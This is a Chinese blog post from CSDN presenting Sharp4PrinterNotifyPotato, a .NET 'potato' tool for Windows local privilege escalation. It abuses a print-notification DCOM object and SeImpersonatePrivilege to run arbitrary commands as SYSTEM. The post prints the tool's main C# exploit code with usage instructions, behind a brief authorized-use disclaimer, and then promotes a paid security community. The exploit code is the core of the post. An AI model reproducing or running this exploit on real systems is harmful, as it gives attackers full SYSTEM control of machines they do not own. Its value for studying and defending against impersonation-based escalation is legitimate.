.NET 一款通过DCOM实现系统提权的工具

已于 2024-07-19 09:49:59 修改
阅读量450 收藏 4
点赞数 4
文章标签: .net 矩阵 安全 web安全
于 2024-07-19 08:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140496799
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4PrinterNotifyPotato 利用了 Windows 中的 DCOM 服务对象和打印通知服务中的权限配置漏洞,通过 SeImpersonatePrivilege 权限进行攻击,从而实现本地权限提升。

03使用方法

首先需要将源码编译成可执行文件Sharp4PrinterNotifyPotato ,运行时传递要执行的命令作为参

数,基本用法如下所示。

Sharp4PrinterNotifyPotato.exe "whoami /all"

工具执行后,当前用户会尝试以 SYSTEM 权限运行传入的命令,并输出结果。具体如下图所示。

04编码实现

以下是 Sharp4PrinterNotifyPotato 的主要功能实现代码,通过初始化COM和模拟登录用户以及创建DCOM对象完成权限提升,具体代码如下所示。

private unsafe static void Main(string[] args)
{
    try
    {
        NativeMethods.CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, 0, 3, IntPtr.Zero, 64, IntPtr.Zero);

        LUID_AND_ATTRIBUTES[] array = new LUID_AND_ATTRIBUTES[1];
        using (WindowsIdentity current = WindowsIdentity.GetCurrent())
        {
            Console.WriteLine("[+] Current user: " + current.Name);
            NativeMethods.LookupPrivilegeValue(null, "SeImpersonatePrivilege", out array[0].Luid);

            TOKEN_PRIVILEGES structure = default(TOKEN_PRIVILEGES);
            structure.PrivilegeCount = 1U;
            structure.Privileges = array;
            array[0].Attributes = 2U;

            if (!NativeMethods.AdjustTokenPrivileges(current.Token, false, ref structure, Marshal.SizeOf<TOKEN_PRIVILEGES>(structure), IntPtr.Zero, IntPtr.Zero) || Marshal.GetLastWin32Error() != 0)
            {
                Console.WriteLine("[x] SeImpersonatePrivilege not held.");
                return;
            }
        }

        Guid clsid = new Guid("{854A20FB-2D44-457D-992F-EF13785D2B51}");
        IntPtr zero = IntPtr.Zero;

        if (!NativeMethods.LogonUser("X", "X", "X", 9, 3, ref zero) || !NativeMethods.ImpersonateLoggedOnUser(zero))
        {
            Console.WriteLine("[x] logon as interactive error.");
        }
        else
        {
            object obj = null;
            int num = NativeMethods.CoCreateInstance(clsid, null, 4, new Guid("00000000-0000-0000-C000-000000000046"), out obj);

            if (num != 0)
            {
                Console.WriteLine("[x] CoCreateInstance fail with HRESULT: 0x" + num.ToString("x"));
            }
            else
            {
                IConnectionPointContainer connectionPointContainer = obj as IConnectionPointContainer;
                IEnumConnectionPoints enumConnectionPoints;
                connectionPointContainer.EnumConnectionPoints(out enumConnectionPoints);

                int celt = 1;
                int num2 = 0;
                IConnectionPoint[] array2 = new IConnectionPoint[1];
                num = enumConnectionPoints.Next(celt, array2, (IntPtr)((void*)(&num2)));
                CustomQIHolder pUnkSink = new CustomQIHolder(args[0]);

                while (array2[0] == null)
                {
                    num = enumConnectionPoints.Next(celt, array2, (IntPtr)((void*)(&num2)));
                    if (num != 0)
                    {
                        break;
                    }
                }

                try
                {
                    array2[0].Advise(pUnkSink, out num2);
                }
                catch
                {
                }
            }
        }
    }
    catch (Exception arg)
    {
        Console.WriteLine("[x] " + arg);
    }
}

Sharp4PrinterNotifyPotato 工具通过初始化 COM 安全性设置,确保当前用户拥有 SeImpersonatePrivilege 权限,并通过模拟一个交互式登录用户,创建一个 DCOM 对象实例,获取 IConnectionPointContainer 接口,并枚举 DCOM 对象的连接点。

随后,工具注册一个自定义事件接收器,以触发权限提升操作,最终以 SYSTEM 权限执行传入的命令。此过程通过调用一系列 Windows API 函数实现。

  05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

dot.Net安全矩阵
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NET测试工具
10-06
1. 资源的所有权益归上传用户所有 2. 未经权益所有人同意,不得将资源中的内容挪作商业或盈利用途 3. CSDN下载频道仅提供交流平台,并不能对任何下载资源负责 4. 下载资源中如有侵权或不适当内容,请与我们联系。 5. 本站不保证本站提供的资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
基于.NET Remoting的分布式系统实现
01-21
.NET Remoting提供了一种高效、灵活的方式来实现分布式系统。通过使用.NET Remoting,开发者可以轻松地创建跨平台、跨地域的应用程序,并能够利用多种通信协议和安全机制。此外,通过详细的代理、通道和远程对象的...
.NET 矩阵6月红队工具和资源集合
ahhacker86的专栏
07-01 533
20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
.NET Core中的性能测试工具BenchmarkDotnet
weixin_30678349的博客
09-18 404
背景介绍 之前一篇博客中,我们讲解.NET Core中的CSV解析库,在文章的最后,作者使用了性能基准测试工具BenchmarkDotNet测试了2个不同CSV解析库的性能,本篇我们来详细介绍一下BenchmarkDotNet。 原文链接:https://dotnetcoretutorials.com/2017/12/04/benchmarking-net-core-code-benchmark...
.Net 诊断工具
iqifenxia的博客
12-07 1456
  起因   本文讲的诊断工具,主要是针对.Net Core 3.1(个别功能不支持)及之后的版本,如.Net 5/.Net 6,对早期的.Net Framework是完全不支持的.即使是.Net Core 3.0之前的版本也不支持,是因为这些工具多数依赖EventPipe组件,EventPipe是CoreCLR的一部分,当然Mono也在增加对EventPipe的支持,所以是支持跨平台的.   这些诊断工具能帮我干什么?   快速定位问题,分析性能瓶颈在哪里可以分析GC,根据内存分配针对性的进行调..
推荐5款超实用的.NET性能分析工具
ljy050618的专栏
11-26 684
摘要:作者把平时工作中使用到的非常不错的.Net分析工具进行总结,在此分享给大家。希望它们能帮助到你! 虽然.NET框架号称永远不会发生内存泄漏,原因是引入了内存回收机制。但在实际应用中,往往我们分配了对象但没有释放指向该对象的引用,导致对象永远无法释放。最常见的情况就是给对象添加了事件处理函数,但当不再使用该对象时却没有将该函数从对象的事件handler中减掉。另外如果分配了非托管内存
解决 asp.net调用office 2007 DCOM 权限问题
08-13
解决在win7或Win2008 64位下asp.net操作office 2007的问题
DCOM 录制工具实现一键DCOM
01-14
先录制,然后保存生成reg文件。利用该reg文件就可以在其他机器上完成DCOM的配置了。分享给大家,共同进步。(可应用于多操作系统
和利时OPC客户端DCOM配置工具
05-06
【和利时OPC客户端DCOM配置工具】是一款专为自动化和工业控制领域的专业人士设计的实用工具,主要用于简化OPC(OLE for Process Control)客户端的DCOM(分布式组件对象模型)配置过程。在OPC通信中,DCOM实现不同...
基于.NET Remoting框架的分布式系统构建.pdf
08-11
总的来说,.NET Remoting为开发者提供了一种强大的工具来构建内部网络中的高性能分布式系统,尤其是在处理大量数据交换和低延迟要求的场景下。尽管它在跨平台性和安全性上相比Web Service有所欠缺,但在某些特定的...
基于WindowsCE.net的嵌入式控制系统
10-22
在具体的应用上WindowsCE.net的操作与传统的微软公司桌上型视窗操作系统ex:Windows2000/XP一样便利,同时提供应用开发者有足够的发展平台例如Networking,InternetService,WebServer,FTPServer,DCOM,....
使用DCOM开发分布式系统.pdf
08-10
DCOM系统通过多层次的安全机制来保障数据传输的安全性和组件调用的合法性,这对于维护分布式系统的稳定运行至关重要。 分布式系统通常处理大量的数据和复杂的功能,需要同时支持多用户访问。以高校教务系统为例,该...
基于.Net分布式过程数据计算平台的实现.pdf
08-11
相比之下,基于.Net平台的Remoting技术提供了一种较好的分布式计算方法,它是DCOM技术的升级,提供了更多改进功能,包括与Web的无缝连接,提高了执行效率和安全性,能够更好地满足协同设计的需求。 知识点五:电厂...
DCOM端口设置工具
01-04
DCOM端口设置工具是财务软件调试的必备工具,技术工程师的常用软件之一。
如何在C#.Net实现OPC数据访问 含代码示例DEMO
02-09
标题“如何在C#.Net实现OPC数据访问 含代码示例DEMO”涉及到的知识点涵盖了OPC(OLE for Process Control)技术的基本概念、如何通过.NET平台与OPC服务器进行通信、特别是如何实现与西门子PLC/WINCC的数据交互。...
.Net性能测试工具BenchmarkDotnet
DHZYKN
01-22 376
转自:.Net性能测试工具BenchmarkDotnet_郑廿三-CSDN博客_benchmarkdotnet
HW漏洞威胁情报第二天|HW情报
最新发布
weixin_43167326的博客
07-24 1677
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!帆软V11 0day sql注入至rce浪潮财务云反序列化rce通达V11.10 前台sql注入金万维异速联云联应用系统GNRemote存在远程命令执行漏洞(已复现)
hvv在即,我们整理了 2024 年部分勒索漏洞清单
FreeBuf_的博客
05-08 1420
可通过官方补丁更新解决该威胁,免费更新链接:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?威胁者可向用户发送恶意文件并诱导用户打开文件来利用该漏洞,成功利用可能导致绕过 SmartScreen安全功能。
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
xnxqwzy的博客
10-08 208
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值